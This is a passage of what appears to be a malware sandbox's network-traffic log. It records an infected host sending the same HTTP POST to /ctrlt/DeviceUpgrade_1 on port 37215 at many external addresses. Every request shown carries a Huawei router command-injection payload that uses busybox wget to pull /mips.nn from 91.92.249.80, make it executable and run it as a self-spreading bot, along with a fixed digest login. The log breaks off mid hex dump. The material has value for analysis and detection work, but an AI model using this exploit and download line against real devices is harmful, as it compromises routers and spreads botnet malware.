                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          531192.168.2.2358172157.167.123.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196010113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          532192.168.2.234764641.107.235.4137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196034908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          533192.168.2.2340240197.201.239.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196043968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          534192.168.2.235695661.84.246.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196048021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          535192.168.2.235205441.216.21.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196125031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          536192.168.2.236057841.44.166.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196157932 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          537192.168.2.2346102157.159.59.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196177006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          538192.168.2.2344554157.121.122.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196197987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          539192.168.2.2344802157.144.206.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196202040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          540192.168.2.235674076.204.80.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.196202040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
